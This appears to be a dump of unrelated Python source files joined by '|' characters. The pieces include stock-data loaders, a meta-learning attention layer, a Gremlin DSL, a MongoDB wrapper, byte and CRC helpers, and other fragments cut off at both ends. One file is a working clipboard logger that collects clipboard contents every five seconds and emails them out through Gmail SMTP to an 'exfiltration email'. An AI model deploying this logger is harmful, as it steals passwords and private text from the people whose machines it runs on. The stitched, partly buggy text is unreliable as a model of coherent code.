engine_sql = create_engine(SQL_ENG_NAME)
def setProfitData(self,year = None,topNo=50, isSave = False,tableName = REFERENCE_PROFIT_DATA):
[yearNow, quarter] = getYearQuarter(year, None)
df = ts.profit_data(year = yearNow,top=topNo)
if isSave is True:
df.to_sql(tableName, self.engine_sql, if_exists='append')
return df
def getProfitData(self,tableName = BASE_STOCK_BASICS):
df = pd.read_sql(tableName, self.engine_sql)
return df
def setForecastData(self,year=None,quarter=None, number = 1, isSave = False,tableName = REFERENCE_FORECAST_DATA):
[year, quarter] = getYearQuarter(year, quarter)
for i in range(0,number):
try:
df = ts.forecast_data(year, quarter)
df['date'] =str(year) + str(quarter)
if isSave is True:
df.to_sql(tableName,self.engine_sql, if_exists='append')
quarter = quarter - 1
if quarter < 1:
quarter = 4
year = year - 1
except IOError,e:
print e
def getForecastData(self, tableName = REFERENCE_FORECAST_DATA):
df = pd.read_sql(tableName, self.engine_sql)
return df
def setXsgData(self,year=None,month=None, number = 1, isSave = False,tableName = REFERENCE_XSG_DATA):
[year, month] = getYearMonth(year, month)
for i in range(0,number):
try:
df = ts.xsg_data(year, month)
if month<10:
df['date'] =str(year) +'0'+ str(month)
else:
df['date'] = str(year) + str(month)
if isSave is True:
df.to_sql(tableName,self.engine_sql, if_exists='append')
month = month - 1
if month < 1:
month = 12
year = year - 1
except IOError,e:
print e
def getXsgData(self, tableName = REFERENCE_XSG_DATA):
df = pd.read_sql(tableName, self.engine_sql)
return df
def setFundHoldings(self,year=None,quarter=None, number = 1, isSave = False,tableName = REFERENCE_HUND_HOLDINGS):
[year, quarter] = getYearQuarter(year, quarter)
for i in range(0,number):
try:
df = ts.fund_holdings(year, quarter)
df['date'] =str(year) + str(quarter)
if isSave is True:
df.to_sql(tableName,self.engine_sql, if_exists='append')
quarter = quarter - 1
if quarter < 1:
quarter = 4
year = year - 1
except IOError,e:
print e
def getFundHoldings(self, tableName = REFERENCE_HUND_HOLDINGS):
df = pd.read_sql(tableName, self.engine_sql)
return df
def setNewStocks(self, isSave = False,tableName = REFERENCE_NEW_STOCKS):
try:
df = ts.new_stocks()
if isSave is True:
df.to_sql(tableName,self.engine_sql, if_exists='append')
except IOError,e:
print e
def getNewStocks(self, tableName = REFERENCE_NEW_STOCKS):
df = pd.read_sql(tableName, self.engine_sql)
return df
def setShMargins(self,endTime =None,number =1, isSave = False,tableName = REFERENCE_SH_MARGINS):
[startTime,endTime] = getStartTime(endTime = endTime, number=number)
try:
df = ts.sh_margins(startTime,endTime)
if isSave is True:
df.to_sql(tableName,self.engine_sql, if_exists='append')
except IOError,e:
print e
def getShMargins(self, tableName = REFERENCE_SH_MARGINS):
df = pd.read_sql(tableName, self.engine_sql)
return df
def setShMarginDetails(self,endTime =None,number =1, isSave = False,tableName = REFERENCE_SH_MARGINS_DETAILS):
[startTime,endTime] = getStartTime(endTime = endTime, number=number)
try:
df = ts.sh_margin_details(start = startTime,end = endTime)
if isSave is True:
df.to_sql(tableName,self.engine_sql, if_exists='append')
except IOError,e:
print e
def getShMarginDetails(self, tableName = REFERENCE_SH_MARGINS_DETAILS):
df = pd.read_sql(tableName, self.engine_sql)
return df
def setSzMargins(self,endTime =None,number =1, isSave = False,tableName = REFERENCE_SH_MARGINS):
[startTime,endTime] = getStartTime(endTime = endTime, number=number)
try:
df = ts.sz_margins(startTime,endTime)
if isSave is True:
df.to_sql(tableName,self.engine_sql, if_exists='append')
except IOError,e:
print e
def getSzMargins(self, tableName = REFERENCE_SH_MARGINS):
df = pd.read_sql(tableName, self.engine_sql)
return df
def setSzMarginDetails(self,endTime =None,startTime = None, isSave = False,tableName = REFERENCE_SH_MARGINS_DETAILS):
dateList = getdatelist(startTime,endTime)
dfAll = None
try:
for dateItem in dateList:
df = ts.sz_margin_details(dateItem)
if dfAll is None:
dfAll = df.copy()
else:
dfAll = dfAll.append(df)
dfAll.drop_duplicates()
if isSave is True:
df.to_sql(tableName,self.engine_sql, if_exists='append')
except IOError,e:
print e
def getSzMarginDetails(self, tableName = REFERENCE_SH_MARGINS_DETAILS):
df = pd.read_sql(tableName, self.engine_sql)
return df
def getAllReferenceInfo(self,year = None, isSave = False):
self.setProfitData(year=2016, topNo=5000, isSave=True)
self.setForecastData(year=2016, quarter=4, number=1, isSave=True)
self.setXsgData(year = 2017, month=12, number = 12, isSave = True)
self.setFundHoldings(year=2017, quarter=4, number=4, isSave=True)
self.setNewStocks(isSave = True)
self.setShMargins(endTime = '2017-12-25',number = 365, isSave = True)
self.setShMarginDetails(endTime = '2015-12-25',number = 365, isSave = True)
if __name__ == '__main__':
reference = ReferenceInfo()
print reference.setShMarginDetails(endTime = '2015-12-25',number = 365, isSave = True) |
import torch.nn as nn
import torch.nn.functional as F
from collections import OrderedDict
from torchmeta.modules.module import MetaModule
from torchmeta.modules.linear import MetaLinear
class MetaMultiheadAttention(nn.MultiheadAttention, MetaModule):
__doc__ = nn.MultiheadAttention.__doc__
def __init__(self, *args, **kwargs):
super(MetaMultiheadAttention, self).__init__(*args, **kwargs)
factory_kwargs = {
'device': kwargs.get('device', None),
'dtype': kwargs.get('dtype', None)
}
bias = kwargs.get('bias', True)
self.out_proj = MetaLinear(self.embed_dim, self.embed_dim,
bias=bias, **factory_kwargs)
def forward(self, query, key, value, key_padding_mask=None,
need_weights=True, attn_mask=None, params=None):
if params is None:
params = OrderedDict(self.named_parameters())
in_proj_weight = params.get('in_proj_weight', None)
in_proj_bias = params.get('in_proj_bias', None)
out_proj_bias = params.get('out_proj.bias', None)
bias_k = params.get('bias_k', None)
bias_v = params.get('bias_v', None)
if not self._qkv_same_embed_dim:
attn_output, attn_output_weights = F.multi_head_attention_forward(
query, key, value, self.embed_dim, self.num_heads,
in_proj_weight, in_proj_bias,
bias_k, bias_v, self.add_zero_attn,
self.dropout, params['out_proj.weight'], out_proj_bias,
training=self.training,
key_padding_mask=key_padding_mask, need_weights=need_weights,
attn_mask=attn_mask, use_separate_proj_weight=True,
q_proj_weight=params['q_proj_weight'],
k_proj_weight=params['k_proj_weight'],
v_proj_weight=params['v_proj_weight'])
else:
attn_output, attn_output_weights = F.multi_head_attention_forward(
query, key, value, self.embed_dim, self.num_heads,
in_proj_weight, in_proj_bias,
bias_k, bias_v, self.add_zero_attn,
self.dropout, params['out_proj.weight'], out_proj_bias,
training=self.training,
key_padding_mask=key_padding_mask, need_weights=need_weights,
attn_mask=attn_mask)
if self.batch_first:
return attn_output.transpose(1, 0), attn_output_weights
else:
return attn_output, attn_output_weights
|
import math
def lcm(a, b):
return int(a * b / math.gcd(a, b))
ans = 1
for d in range(10, 20):
ans = lcm(ans, d + 1)
print(ans)
# Copyright Junipyr. All rights reserved.
# https://github.com/Junipyr |
"""
Abstract Functor
A functor is an operator defined on a type that consists of mappings from objects,
and mappings for a morphism.
i.e. contains a Transform type and Morphism type
"""
from typing import TypeVar, Generic
__all__ = ["AbstractFunctor"]
from ..type import AbstractType
from ._operator import AbstractOperator
from .core.transform import AbstractTransform
from .core.morphism import AbstractMorphism
C = TypeVar("C", bound=AbstractType)
# [TODO] need to do the class getitem trick
"""
this is known as AbstractFunctor[C, D]
makes sense as the functor category / functor type.
"""
class AbstractFunctor(
AbstractOperator,
):
transforms: set[AbstractTransform[C, D]]
morphisms: set[AbstractMorphism[C]] # one morphism for every AbstractMorphism[C]
|
__version__ = "2.0+master"
|
"""Gremlin DSL for the Security Graph Altimeter Universe."""
from datetime import datetime
import uuid
from gremlin_python.process.graph_traversal import (
GraphTraversal,
GraphTraversalSource,
__ as AnonymousTraversal,
)
from gremlin_python.process.traversal import (
T,
Cardinality,
Bytecode,
)
class AltimeterTraversal(GraphTraversal):
"""Graph Traversal for the Altimeter Universe."""
def link_to_universe(self, universe):
"""Creates an edge from the vertices in the traversal to the current
universe vertex."""
return self \
.sideEffect(
__.addE('universe_of')
.from_(__.V().is_universe_obj(universe))
)
def is_universe(self):
"""Filters the vertices that are Universes."""
return self \
.hasLabel('Universe')
def is_universe_obj(self, universe):
"""Filters the Universe vertex with a given version and
namespace."""
return self \
.is_universe() \
.has('namespace', universe.namespace) \
.has('version', universe.version.int_version)
def linked_universe(self):
"""Returns the ``Universe`` associated with a vertex."""
return self \
.inE() \
.is_universe_of() \
.outV()
def is_linked_to_universe(self, universe):
"""Returns the ``Universe`` vertex associated with a vertex only if it
matches the specified universe."""
return self \
.linked_universe() \
.is_universe_obj(universe)
def is_universe_of(self):
"""Filters edges of type ``universe_of``."""
return self.hasLabel('universe_of')
class __(AnonymousTraversal):
"""Anonymous Traversal for the Altimeter Universe."""
graph_traversal = AltimeterTraversal
@classmethod
def link_to_universe(cls, *args):
"""Creates an edge from the vertices in the transversal to the current
universe vertex."""
return cls.graph_traversal(
None, None, Bytecode()).link_to_universe(*args)
@classmethod
def is_universe(cls, *args):
"""Filters the vertices that are Altimeter Universes."""
return cls.graph_traversal(
None, None, Bytecode()).is_universe(*args)
@classmethod
def is_universe_obj(cls, *args):
"""Filters the Altimeter Universe with a given version and
namespace."""
return cls.graph_traversal(
None, None, Bytecode()).is_universe(*args)
@classmethod
def is_linked_to_universe(cls, *args):
"""Returns the ``Universe`` vertex associated with a vertex only if it
matches the specified universe."""
return cls.graph_traversal(
None, None, Bytecode()).is_linked_to_universe(*args)
@classmethod
def is_universe_of(cls):
"""Filters edges of type ``universe_of``."""
return cls.graph_traversal(
None, None, Bytecode()).is_universe_of()
class AltimeterTraversalSource(GraphTraversalSource):
"""Graph Traversal Source for the Altimeter Universe."""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.graph_traversal = AltimeterTraversal
def ensure_universe(self, universe):
"""Creates a new Altimeter ``Universe`` vertex, if it doesn't
exist, and returns its id."""
return self \
.V() \
.is_universe_obj(universe) \
.fold() \
.coalesce(
# The universe vertex already exists.
__.unfold()
.elementMap(),
# The universe vertex does not exist.
__.addV('Universe')
.property(T.id, str(uuid.uuid4()))
.property(
Cardinality.single,
'namespace',
universe.namespace
)
.property(
Cardinality.single,
'version',
universe.version.int_version
)
.elementMap(),
)
def linked_universe(self, vid):
"""Returns a ``Universe`` vertex associated with the vertex identified
by the vertex id ``vid``."""
ret = self \
.V(vid) \
.linked_universe()
return ret
def universe(self, universe):
"""Returns the ``Universe`` vertex that corresponds to specified
universe."""
return self\
.V() \
.is_universe_obj(universe)
def link_to_universe(self, universe, vid):
"""Links a given ``Universe`` to the specified vertex"""
return self\
.V(vid) \
.link_to_universe(universe)
def add_snapshot(self, vid, universe):
"""Creates a new Snapshot vertex with the given vid, links it to the
given universe and returns the newly created vertex."""
return self \
.addV('altimeter_snapshot') \
.property(T.id, vid) \
.property(Cardinality.single, 'timestamp', datetime.now()) \
.link_to_universe(universe)
|
from core import art
from core.files import FileHandler
import random
import shutil
import json
import sys
import os
class InfoHandler:
def __init__(self, data_filepath, metadata_filepath):
self.data_filepath = data_filepath
self.metadata_filepath = metadata_filepath
# copy each file to the export directory
# change their names to prevent merge conflicts
# we can assume that the directories exist, as they were created by the group merger
# this can be asynchronous, as nothing depends on it
def export_pair(self, index, export_directory):
# get the files out of the filepaths
_, data_file = os.path.split(self.data_filepath)
_, metadata_file = os.path.split(self.metadata_filepath)
# get the extension for the data file
_, extension = os.path.splitext(data_file)
# create the export filepaths (use the indexes, as we do not want export conflicts or overwrites)
export_data_filepath = f"{export_directory}/{art.FILE_FOLDER}/{index}{extension}"
export_metadata_filepath = f"{export_directory}/{art.METADATA_FOLDER}/{index}"
# move each file
shutil.copy(self.data_filepath, export_data_filepath)
shutil.copy(self.metadata_filepath, export_metadata_filepath)
return export_data_filepath, export_metadata_filepath
# create a class to merge groups of information
class GroupMerger(FileHandler):
def __init__(self, export_directory, directories):
self.directories = directories
self.export_directory = export_directory
# get all the files from each directory --> put them in info handlers
self.info_handlers = []
for directory in directories:
# get the directory extension
extension = self.get_directory_extension(directory)
# if there is no extension, quit and signal such
if not extension:
print(f"No extensions could be found in {directory}")
sys.exit()
# get the file pairs
self.info_handlers.extend(self.get_file_pairs(
directory, extension))
# make sure the export directory Exists
self.check_export_directory()
# function to get the file pairs
def get_file_pairs(self, directory, extension):
# store the pairs
pairs = []
# get the files
files = os.listdir(f"{directory}/{art.METADATA_FOLDER}")
# check if the pairs exist for everything in metadata
for file in files:
pair = self.get_file_pair(directory, file, extension)
# if there is a pair
if pair:
pairs.append(pair)
else:
print(f"No file found corresponding to metadata file: {file}")
return pairs
# function to check if a file pair exists
def get_file_pair(self, directory, file, extension):
data_file = f"{directory}/{art.FILE_FOLDER}/{file}{extension}"
metadata_file = f"{directory}/{art.METADATA_FOLDER}/{file}"
if not os.path.isfile(data_file):
return None
if not os.path.isfile(metadata_file):
return None
else:
return InfoHandler(data_file, metadata_file)
# function to export all
# this SHOULD be multithreaded, but I haven't had the time to put it together yet, so it remains single-threaded
def export_all(self):
# shuffle the info handlers
random.shuffle(self.info_handlers)
# iterate over all the info handlers --> export pair
for i in range(len(self.info_handlers)):
# get the info handler --> have it export with the index to the export directory
new_data_file, new_metadata_file = self.info_handlers[i].export_pair(
i, self.export_directory)
# change the name in the metadata
self.rename(new_metadata_file)
# create a way to rename the citizens in order (just going to point to the wrong index after creation)
def rename(self, filepath):
# read the data
with open(filepath, 'r') as infile:
data = json.loads(infile.read())
# get the filename, which will correspond to the new name
_, new_name = os.path.split(filepath)
# change the name
prefix = data['name'].split('#')[0]
data['name'] = f"{prefix}#{new_name}"
# rewrite the file
with open(filepath, 'w') as outfile:
outfile.write(json.dumps(data, indent=4))
|
"""Nonstationary (linear trend) flood frequency analysis stan
"""
import os
import numpy as np
from . import StatisticalModel
from ..path import data_path
from ..util import compile_model
class LN2LinearTrend(StatisticalModel):
"""Lognormal Model with linear trend and constant CV
"""
def __init__(self, **kwargs) -> None:
self.model_file = os.path.abspath(os.path.join(data_path, "ln2-trend.stan"))
model_param: dict = {
"mu0_mean": kwargs.pop("mu0_mean", 10),
"mu0_sd": kwargs.pop("mu0_sd", 1),
"beta_mu_mean": kwargs.pop("beta_mu_mean", 0),
"beta_mu_sd": kwargs.pop("beta_mu_sd", 0.5),
"cv_logmean": kwargs.pop("cv_logmean", np.log(0.1)),
"cv_logsd": kwargs.pop("cv_logsd", 0.5),
"n_warmup": kwargs.pop("n_warmup", 1000),
"n_chain": kwargs.pop("n_chain", 1),
}
super().__init__(**kwargs)
self.param.update(model_param)
self.model_name = "LN2 Linear Trend"
def _calculate_one(self, data) -> np.ndarray:
stan_data = {"y": data, "N": self.N, "M": self.M}
for param in [
"mu0_mean",
"mu0_sd",
"beta_mu_mean",
"beta_mu_sd",
"cv_logmean",
"cv_logsd",
]:
stan_data.update({"{}".format(param): self.param.get(param)})
stan_mod = compile_model(
filename=self.model_file, model_name="LN2-Linear-Trend"
)
n_iter: int = self.param.get("n_mcsim") + self.param.get("n_warmup")
fit = stan_mod.sampling(
data=stan_data,
iter=n_iter,
chains=self.param.get("n_chain"),
warmup=self.param.get("n_warmup"),
)
fit_dict = fit.extract(permuted=True)
return fit_dict["yhat"]
|
import csv
def remove(string_input):
return "".join(string_input.split())
def best_value(cvs_file): #returns the best value in a dataset
with open('data/second_testing_set.csv', 'r') as file:
reader = file.readlines()
last_row = remove(reader[-1])
c = 0
final = ""
for i in last_row:
if i == ",": c += 1
if c == 2:
final = final + i
if i ==3: break
return final[1:]
def candidate_value(x): #returns the candidate value in a dataset
row = remove(x)
c = 0
final = ""
for i in row:
if i == ",": c += 1
if c == 1:
final = final + i
if i ==2: break
return final[1:]
|
#!/usr/bin/python
import sys,pymongo
from pymongo import Connection
from pymongo.errors import ConnectionFailure
from bson.code import Code
class MongoDB:
'''Manage database layer for Mongodb'''
def __init__(self,db_name):
# print "MongoDB constructor"
self.db_name = db_name
self.db_host = 'localhost'
def insertBulk(self,docs,table_name):
"insert a list of events map"
try:
connection = Connection(host=self.db_host, port=27017)
except ConnectionFailure, e:
sys.stderr.write("Could not connect to MongoDB: %s" % e)
sys.exit(1)
db_handler = connection[self.db_name]
assert db_handler.connection == connection
db_handler[table_name].insert(docs, safe=True)
connection.end_request()
def count(self, table_name, query={}):
try:
connection = Connection(host=self.db_host, port=27017)
except ConnectionFailure, e:
sys.stderr.write("Could not connect to MongoDB: %s" % e)
sys.exit(1)
db_handler = connection[self.db_name]
assert db_handler.connection == connection
count = db_handler[table_name].find(query).count()
connection.end_request()
return count
def removeAll(self, table_name):
try:
connection = Connection(host=self.db_host, port=27017)
except ConnectionFailure, e:
sys.stderr.write("Could not connect to MongoDB: %s" % e)
sys.exit(1)
db_handler = connection[self.db_name]
assert db_handler.connection == connection
db_handler[table_name].remove()
connection.end_request()
def find(self, table_name, page_size, page_num, sort_field, sort_direction=pymongo.DESCENDING,query={}):
# name like '%m%' ==> db.users.find({"name": /.*m.*/}) db.collectionname.find({'files':{'$regex':'^File'}})
try:
connection = Connection(host=self.db_host, port=27017)
except ConnectionFailure, e:
sys.stderr.write("Could not connect to MongoDB: %s" % e)
sys.exit(1)
db_handler = connection[self.db_name]
assert db_handler.connection == connection
if page_num > 1:
events_doc = db_handler[table_name].find(query).sort([(sort_field,sort_direction)]).limit(page_size).skip(page_size * (page_num-1) )
else:
events_doc = db_handler[table_name].find(query).sort([(sort_field,sort_direction)]).limit(page_size)
connection.end_request()
# if event_count_doc:
# print "Successfully fetch document:" + str(event_count_doc["index"])
return events_doc
def countSize(self,table_name,query={}):
'''count download size group by source ip'''
try:
connection = Connection(host=self.db_host, port=27017)
except ConnectionFailure, e:
sys.stderr.write("Could not connect to MongoDB: %s" % e)
sys.exit(1)
db_handler = connection[self.db_name]
assert db_handler.connection == connection
key={"ip":True}
initial = {"size":0}
reducer = Code('function(doc, prev) {prev.size = prev.size + doc.size;}')
download_size_doc = db_handler[table_name].group(key,query,initial,reducer)
connection.end_request()
return download_size_doc
def get_user(self,user_name):
'''get users by name'''
try:
connection = Connection(host=self.db_host, port=27017)
except ConnectionFailure, e:
sys.stderr.write("Could not connect to MongoDB: %s" % e)
sys.exit(1)
db_handler = connection[self.db_name]
assert db_handler.connection == connection
users_doc = db_handler['users'].find({'username' : user_name})
connection.end_request()
return users_doc
def test():
db = MongoDB('esm')
num_of_events = db.count('events')
print 'num_of_events = ' + str(num_of_events)
if __name__ == "__main__":test()
|
#! Python
# To grab the clipboard.
import pyperclip
# Used to send emails every certain amount of time of the log.
import smtplib
# Threading Library.
import threading
log = ""
lastLogged = ""
count = 0
# Sends us the email of the log on the given interval.
def send_email(email, password, message):
# Initialize server for gmail
email_server = smtplib.SMTP("smtp.gmail.com", 587)
# Start server
email_server.starttls()
# Login for me
email_server.login(email, password)
# Send the log to yourself
email_server.sendmail(email, email, message)
# Quit
email_server.quit()
# We need to THREAD to send emails and retrieve info at the same time.
def thread_function():
global log
global count
global lastLogged
if count < 60:
if lastLogged != pyperclip.paste():
log += pyperclip.paste()
lastLogged = pyperclip.paste()
count += 1
timer_object = threading.Timer(5, thread_function)
timer_object.start()
else:
if lastLogged != pyperclip.paste():
log += pyperclip.paste()
lastLogged = pyperclip.paste()
# Change the first two values to whatever your desired exfiltration email is.
send_email("[email protected]", "yourpassword", log)
# Uncomment this line if you want a demo that prints to the command line instead of emailing yourself.
#print(log)
log = ""
count = 0
timer_object = threading.Timer(5, thread_function)
timer_object.start()
thread_function()
|
# Software License Agreement (BSD License)
#
# Copyright (c) 2014, Andrew Wilson
# Copyright (c) 2012, Dorian Scholz
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Willow Garage, Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from python_qt_binding.QtWidgets import \
QButtonGroup, QCheckBox, QGroupBox, QLabel, QVBoxLayout
class CheckBoxGroup(QGroupBox):
"""
Creates a button group of non-exclusive checkbox options.
Options must be a dict with following keys: 'enabled','title','description','tooltip'
"""
def __init__(self, options, title='Checkboxes', selected_indexes=[], parent=None):
super(CheckBoxGroup, self).__init__()
self.setTitle(title)
self.setLayout(QVBoxLayout())
self._button_group = QButtonGroup()
self._button_group.setExclusive(False)
self._options = options
if parent is None:
parent = self
for (button_id, option) in enumerate(self._options):
checkbox = QCheckBox(option.get('title', 'option %d' % button_id))
checkbox.setEnabled(option.get('enabled', True))
checkbox.setChecked(button_id in selected_indexes)
checkbox.setToolTip(option.get('tooltip', ''))
self._button_group.addButton(checkbox, button_id)
parent.layout().addWidget(checkbox)
if 'description' in option:
parent.layout().addWidget(QLabel(option['description']))
def get_settings(self):
"""Return dictionary with selected_indexes (array) and selected_options (array) keys."""
selected_indexes = []
selected_options = []
for button in self._button_group.buttons():
if button.isChecked():
selected_indexes.append(self._button_group.id(button))
selected_options.append(self._options[self._button_group.id(button)])
return {'selected_indexes': selected_indexes, 'selected_options': selected_options}
|
#!/usr/bin/python
#coding:utf8
import random
from sb import s, b
################################################################################
small_prime_table = (
0x0002, 0x0003, 0x0005, 0x0007, 0x000B, 0x000D, 0x0011, 0x0013,
0x0017, 0x001D, 0x001F, 0x0025, 0x0029, 0x002B, 0x002F, 0x0035,
0x003B, 0x003D, 0x0043, 0x0047, 0x0049, 0x004F, 0x0053, 0x0059,
0x0061, 0x0065, 0x0067, 0x006B, 0x006D, 0x0071, 0x007F, 0x0083,
0x0089, 0x008B, 0x0095, 0x0097, 0x009D, 0x00A3, 0x00A7, 0x00AD,
0x00B3, 0x00B5, 0x00BF, 0x00C1, 0x00C5, 0x00C7, 0x00D3, 0x00DF,
0x00E3, 0x00E5, 0x00E9, 0x00EF, 0x00F1, 0x00FB, 0x0101, 0x0107,
0x010D, 0x010F, 0x0115, 0x0119, 0x011B, 0x0125, 0x0133, 0x0137,
0x0139, 0x013D, 0x014B, 0x0151, 0x015B, 0x015D, 0x0161, 0x0167,
0x016F, 0x0175, 0x017B, 0x017F, 0x0185, 0x018D, 0x0191, 0x0199,
0x01A3, 0x01A5, 0x01AF, 0x01B1, 0x01B7, 0x01BB, 0x01C1, 0x01C9,
0x01CD, 0x01CF, 0x01D3, 0x01DF, 0x01E7, 0x01EB, 0x01F3, 0x01F7,
0x01FD, 0x0209, 0x020B, 0x021D, 0x0223, 0x022D, 0x0233, 0x0239,
0x023B, 0x0241, 0x024B, 0x0251, 0x0257, 0x0259, 0x025F, 0x0265,
0x0269, 0x026B, 0x0277, 0x0281, 0x0283, 0x0287, 0x028D, 0x0293,
0x0295, 0x02A1, 0x02A5, 0x02AB, 0x02B3, 0x02BD, 0x02C5, 0x02CF,
0x02D7, 0x02DD, 0x02E3, 0x02E7, 0x02EF, 0x02F5, 0x02F9, 0x0301,
0x0305, 0x0313, 0x031D, 0x0329, 0x032B, 0x0335, 0x0337, 0x033B,
0x033D, 0x0347, 0x0355, 0x0359, 0x035B, 0x035F, 0x036D, 0x0371,
0x0373, 0x0377, 0x038B, 0x038F, 0x0397, 0x03A1, 0x03A9, 0x03AD,
0x03B3, 0x03B9, 0x03C7, 0x03CB, 0x03D1, 0x03D7, 0x03DF, 0x03E5,
0x03F1, 0x03F5, 0x03FB, 0x03FD, 0x0407, 0x0409, 0x040F, 0x0419,
0x041B, 0x0425, 0x0427, 0x042D, 0x043F, 0x0443, 0x0445, 0x0449,
0x044F, 0x0455, 0x045D, 0x0463, 0x0469, 0x047F, 0x0481, 0x048B,
0x0493, 0x049D, 0x04A3, 0x04A9, 0x04B1, 0x04BD, 0x04C1, 0x04C7,
0x04CD, 0x04CF, 0x04D5, 0x04E1, 0x04EB, 0x04FD, 0x04FF, 0x0503,
0x0509, 0x050B, 0x0511, 0x0515, 0x0517, 0x051B, 0x0527, 0x0529,
0x052F, 0x0551, 0x0557, 0x055D, 0x0565, 0x0577, 0x0581, 0x058F,
0x0593, 0x0595, 0x0599, 0x059F, 0x05A7, 0x05AB, 0x05AD, 0x05B3,
0x05BF, 0x05C9, 0x05CB, 0x05CF, 0x05D1, 0x05D5, 0x05DB, 0x05E7,
0x05F3, 0x05FB, 0x0607, 0x060D, 0x0611, 0x0617, 0x061F, 0x0623,
0x062B, 0x062F, 0x063D, 0x0641, 0x0647, 0x0649, 0x064D, 0x0653
)
################################################################################
def bytes2list(data):
return [ord(c) for c in data]
def list2bytes(byte_list):
return ''.join([chr(x) for x in byte_list])
def bytes2int(data):
'''
'\x12\x34\x56\x78' => 0x12345678
'''
v = 0
for c in data:
v <<= 8
v |= ord(c)
return v
def int2bytes(n, length = -1):
'''
0x12345678 => '\x12\x34\x56\x78'
'''
datas = []
while n:
datas.append(chr(n & 0xFF))
n >>= 8
datas.reverse()
data = ''.join(datas)
data_len = len(data)
if length > data_len:
data = '\x00' * (length - data_len) + data
return data
def left_shift_1bit(data):
datas = []
length = len(data)
msb = 0
for i in range(length - 1, -1, -1):
d = ord(data[i])
d = (d << 1) | msb
msb = (d >> 8)
d &= 0xFF
datas.append(chr(d))
datas.reverse()
return ''.join(datas)
def get_ber_bytes(length):
data = ''
if length < 128:
data = chr(length)
elif length < 256:
data = '\x81' + chr(length)
elif length < 65536:
data = '\x82' + chr((length>>8)&0xFF) + chr(length&0xFF)
else:
data = '\x83' + chr((length >> 16)&0xFF) + chr((length>>8)&0xFF) + chr(length&0xFF)
return data
def get_ber_length(bytes):
i = 0
#L
L = ord(bytes[i])
i += 1
l_length = 1
if (L == 0x81):
L = ord(bytes[i])
i += 1
l_length += 1
assert((L >= 128) and (L <= 255))
elif (L == 0x82):
L = (ord(bytes[i]) << 8) | ord(bytes[i+1])
i += 2
l_length += 2
assert((L >= 256) and (L <= 65535))
elif (L == 0x83):
L = (ord(bytes[i]) << 16) | (ord(bytes[i+1]) << 8) | ord(bytes[i+2])
i += 3
l_length += 3
assert(L >= 65536)
else:
assert(L <= 127)
return (l_length, L, bytes[i:])
################################################################################
def is_small_prime(n):
flag = True
if n < 2:
return False
k = 2
while (k * k) <= n:
if n % k == 0:
flag = False
break
k += 1
return flag
################################################################################
def random_bytes(length):
datas = []
for i in range(length):
datas.append(chr(random.randint(0x00, 0xFF)))
return ''.join(datas)
def random_nozero_bytes(length):
datas = []
i = 0
while True:
if i == length:
break
v = random_bytes(1)
if v == '\x00':
continue
else:
datas.append(v)
i += 1
return ''.join(datas)
################################################################################
def zero_pad(data, length):
len1 = len(data)
if length > len1:
data = '\x00' * (length - len1) + data
return data
def xor(A, B):
assert(len(A) == len(B))
return ''.join([chr(ord(A[i]) ^ ord(B[i])) for i in range(len(A))])
def checksum(bytes):
r = 0
for c in bytes:
r ^= ord(c)
return chr(r)
def compute_crc(data, init_value = 0x6363):
wCrc = init_value
for c in data:
ch = (ord(c) ^ (wCrc & 0x00ff)) & 0x00ff
ch = (ch ^ (ch << 4)) & 0x00ff
wCrc = ((wCrc >> 8) & 0x00ff) ^ (ch << 8) ^ (ch << 3) ^ (ch >> 4)
ret1 = chr(wCrc & 0x00ff)
ret2 = chr((wCrc >> 8) & 0x00ff)
return ret1 + ret2
################################################################################
def main():
'''
v = int("12345678" * 1000)
print hex(v)
bytes = int2bytes(v, 0x08)
print s(bytes)
v = bytes2int(bytes)
print hex(v)
'''
a1 = "1122334455 66 77"
a2 = b(a1)
a3 = s(a2, ', ', '(byte)0x')
print a1
print a3
if __name__ == '__main__':
main()
|
from gpiozero import FishDish
from signal import pause
fish = FishDish()
fish.button.when_pressed = fish.on
fish.button.when_released = fish.off
pause()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from datetime import date, timedelta
import extract, fmt
def _prepstr(s):
"""
>>> _prepstr(s='')
''
>>> _prepstr(s='$')
'$'
>>> _prepstr(s=' ')
''
>>> _prepstr(s='hello world')
'hello world'
>>> _prepstr(s='hello world')
'hello world'
>>> _prepstr(s='Hello World')
'hello world'
>>> _prepstr(s='HELLO WORLD')
'hello world'
"""
return fmt.compress_whitespace(s.lower())
def dollar_amount(s):
#
# Find the amount
"""
>>> dollar_amount('19.99')
(19.99, '')
>>> dollar_amount('-19.99')
(-19.99, '')
>>> dollar_amount('+19.99')
(19.99, '')
>>> dollar_amount('$19.99')
(19.99, '')
>>> dollar_amount('19.99 for coffee')
(19.99, 'for coffee')
>>> dollar_amount('$19.99 for coffee')
(19.99, 'for coffee')
>>> dollar_amount('coffee 19.99')
(19.99, 'coffee')
>>> dollar_amount('coffee $19.99')
(19.99, 'coffee')
>>> dollar_amount('$19.99 for coffee at 4.20 bar')
(19.99, 'for coffee at 4.20 bar')
>>> dollar_amount('4.20 $19.99 wine')
(19.99, '4.20 wine')
